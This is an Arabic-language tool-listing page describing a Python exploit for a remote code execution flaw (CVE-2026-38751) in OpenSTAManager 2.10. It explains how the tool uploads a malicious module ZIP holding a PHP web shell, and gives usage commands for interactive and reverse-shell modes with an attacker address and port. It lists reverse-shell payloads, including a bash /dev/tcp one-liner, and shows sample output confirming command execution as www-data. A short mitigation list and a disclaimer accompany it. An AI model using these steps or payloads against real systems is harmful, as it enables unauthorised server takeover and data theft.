OpenSTAManager_RCE_Exploit-CVE-2026-38751- — استغلال تنفيذ التعليمات البرمجية عن بُعد في OpenSTAManager (CVE-2026-38751) | Kitploit
أدوات / GitHub / hackthem / openstamanager_rce_exploit-cve-2026-38751-
hackthem/openstamanager_rce_exploit-cve-2026-38751- اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.
آخر 7 أيام آخر 30 يومًا
OpenSTAManager_RCE_Exploit-CVE-2026-38751- استغلال تنفيذ التعليمات البرمجية عن بُعد في OpenSTAManager (CVE-2026-38751)
1 6 منذ 2 أشهراستغلال OpenSTAManager للتنفيذ عن بُعد (RCE) (CVE-2026-38751)
نظرة عامة
يستغل هذا السكربت المكتوب بلغة Python ثغرة تنفيذ الأكواد عن بُعد (Remote Code Execution) في OpenSTAManager الإصدار 2.10، والمعروفة بـ CVE-2026-38751. يسمح هذا الاستغلال للمستخدمين المصادَق عليهم برفع وحدة خبيثة وتنفيذ أوامر تعسفية على النظام المستهدف.
تفاصيل الثغرة
معرف CVE : CVE-2026-38751
المنتج : OpenSTAManager
الإصدار : 2.10
النوع : تنفيذ الأكواد عن بُعد (RCE)
ناقل الهجوم : قائم على الويب، ويتطلب مصادقة صالحة
كيف يعمل الاستغلال
يتبع الاستغلال الخطوات التالية:
المصادقة : تسجيل الدخول إلى تطبيق OpenSTAManager باستخدام بيانات الاعتماد المقدَّمة
تفعيل التحديثات : تفعيل وظيفة تحديث الوحدات المطلوبة للاستغلال
إنشاء ملف ZIP خبيث : يُنشئ ملف ZIP يحتوي على:
ملف تعريف وحدة (MODULE)
سكربت شل PHP (shell.php) ينفذ الأوامر عبر معامل GET باسم c
رفع الوحدة : رفع ملف ZIP الخبيث عبر واجهة تحديث الوحدات
التحقق من الاستغلال : التأكد من أن الشل قابل للوصول ويعمل بشكل صحيحتنفيذ الأوامر : إما:
وضع شل تفاعلي لتنفيذ الأوامر يدويًا
اتصال شل عكسي لإنشاء اتصال دائم
المتطلبات الأساسية
Python 3.x
حزم Python المطلوبة: requests, zipfile
بيانات اعتماد إدارية صالحة لـ OpenSTAManager
وصول شبكي إلى النظام المستهدف
طريقة الاستخدام
الاستخدام الأساسي python3 exploit.py -u http://target.com -U admin -P password
وضع الشل التفاعلي python3 exploit.py -u http://target.com -U admin -P password --interactive
وضع الشل العكسي python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
الوسائط الوسيط الوصف -u, --urlعنوان URL الهدف (مطلوب) -U, --userاسم المستخدم للمصادقة (مطلوب) -P, --passwordكلمة المرور للمصادقة (مطلوب) --interactiveالدخول إلى وضع الشل التفاعلي --no-cleanupعدم إزالة ملفات الشل بعد التنفيذ --lhostالمضيف المحلي للشل العكسي --lportالمنفذ المحلي للشل العكسي
التفاصيل الفنية
عملية الاستغلال
المصادقة : يرسل السكربت طلب تسجيل دخول إلى نقطة نهاية المصادقة في التطبيق
تفعيل تحديث الوحدات : يرسل طلب POST لتفعيل وظيفة تحديث الوحدات
إنشاء ملف ZIP : يُنشئ أرشيف ZIP يحتوي على:
shell/MODULE: ملف إعدادات الوحدة
shell/shell.php: ويب شل PHP ينفذ الأوامر المُمرَّرة عبر معامل GET باسم c
عملية الرفع : يستخدم بيانات نموذج multipart لرفع ملف ZIP الخبيث إلى نقطة نهاية تحديث الوحدات
التحقق : يختبر الشل المرفوع عن طريق تنفيذ أمر بسيط مثل id للتأكد من أنه يعمل
تنفيذ الأوامر : إما توفير شل تفاعلي أو إنشاء اتصال شل عكسي
الحمولات المستخدمة يحاول الاستغلال استخدام عدة حمولات للشل العكسي:
شل عكسي بـ Bash: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
شل عكسي بـ Python باستخدام اتصالات socket
حمولة Bash مشفرة بـ Base64
شل عكسي عبر Netcat
الاعتبارات الأمنية ⚠️ إخلاء مسؤولية : هذا الاستغلال مخصص للأغراض التعليمية واختبارات الأمان المصرح بها فقط.
تقييم المخاطر
تنفيذ أكواد تعسفية بصلاحيات مستخدم خادم الويب
احتمال تصعيد الصلاحيات
الوصول إلى البيانات الحساسة المخزنة على النظام
إمكانية الحركة الجانبية داخل الشبكة
التخفيف
تحديث OpenSTAManager إلى أحدث إصدار
تنفيذ ضوابط مصادقة مناسبة
تقييد إمكانيات رفع الملفات
مراقبة الأنشطة المشبوهة
تطبيق تقسيم الشبكة
مثال على المخرجات [ OpenSTAManager RCE Exploit : ]
Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit
المراجع
الترخيص يُقدَّم هذا الاستغلال للأغراض التعليمية فقط. يُعد الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها أمرًا غير قانوني.